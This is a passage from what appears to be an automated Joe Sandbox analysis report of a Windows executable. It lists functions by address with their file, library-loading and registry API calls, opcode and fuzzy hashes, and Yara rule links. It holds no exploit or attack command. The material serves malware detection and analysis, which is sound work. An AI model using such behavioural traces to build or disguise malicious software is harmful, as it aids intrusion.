                                                                                                                                                                                                                                            • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                                                                                                                                                                                                            Function 004104FB Relevance: 2.6, APIs: 2, Instructions: 140COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                                                                                                                                                                                                              • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                                                                                                                                                                            • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                                                                                                                                                                                            • CloseHandle.KERNELBASE(?), ref: 00410654
                                                                                                                                                                                                                                              • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                                                                                                              • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                                                                                                                                                                                              • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                                                                                                                                                              • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1381354015-0
                                                                                                                                                                                                                                            • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                                                                                                                                                            • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                                                                                                                                                                            Function 0040B1AB Relevance: 2.5, APIs: 2, Instructions: 14COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                                                                                            • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                                                                                                                                                            • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                                                                                                                                                                                            Function 00403988 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                                                                                                                                                              • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                                                                                                              • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                                                                                              • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                                                                                                                                            • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2154303073-0
                                                                                                                                                                                                                                            • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                                                                                                                            • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                                                                                                                                                                            Function 004135F7 Relevance: 1.5, APIs: 1, Instructions: 44libraryloaderCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                                                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3150196962-0
                                                                                                                                                                                                                                            • Opcode ID: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                                                                                                                                                                                            • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                                                                                                                                                                                            Function 004062A6 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                                                                                                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: File$PointerRead
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3154509469-0
                                                                                                                                                                                                                                            • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                                                                                            • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                                                                                                                                                                            Function 00414561 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                                                                                                                                                              • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                                                                                                                                                              • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                                                                                                                                                              • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4232544981-0
                                                                                                                                                                                                                                            • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                                                                                                            • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                                                                                                                                                                            Function 0040A2EF Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FileRead
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2738559852-0
                                                                                                                                                                                                                                            • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                                                                                            • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                                                                                                                                                                            Function 0040A30E Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FileWrite
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3934441357-0
                                                                                                                                                                                                                                            • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                                                                                                            • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                                                                                                                                                                            Function 004096C3 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                                                                                                            • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                                                                                                            • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                                                                                                                                                                            Function 004096DC Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                                                                                                            • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                                                                                                            • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                                                                                                                                                                            Function 0040B04B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ??3@
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 613200358-0
                                                                                                                                                                                                                                            • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                                                                                                            • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                                                                                                                                                                            Function 004135E0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FreeLibrary
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3664257935-0
                                                                                                                                                                                                                                            • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                                                                                                            • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                                                                                                                                                                            Function 0041493C Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: EnumNamesResource
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3334572018-0
                                                                                                                                                                                                                                            • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                                                                                                            • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                                                                                                                                                                            Function 00414592 Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Open
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 71445658-0
                                                                                                                                                                                                                                            • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                                                                                                                            • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                                                                                                                                                                                            Function 004095D9 Relevance: 1.3, APIs: 1, Instructions: 66COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 004095FC
                                                                                                                                                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                                              • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                                                                                                                                                              • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                                                                                                                              • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3655998216-0
                                                                                                                                                                                                                                            • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                                                                                                                            • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                                                                                                                                                                            Function 00445403 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00445426
                                                                                                                                                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                                                              • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                                                              • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1828521557-0
                                                                                                                                                                                                                                            • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                                                                                                                            • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                                                                                                                                                                            Function 00406214 Relevance: 1.3, APIs: 1, Instructions: 39COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                                                                                                                                                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                                                                                                                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: File$CloseCreateErrorHandleLastRead
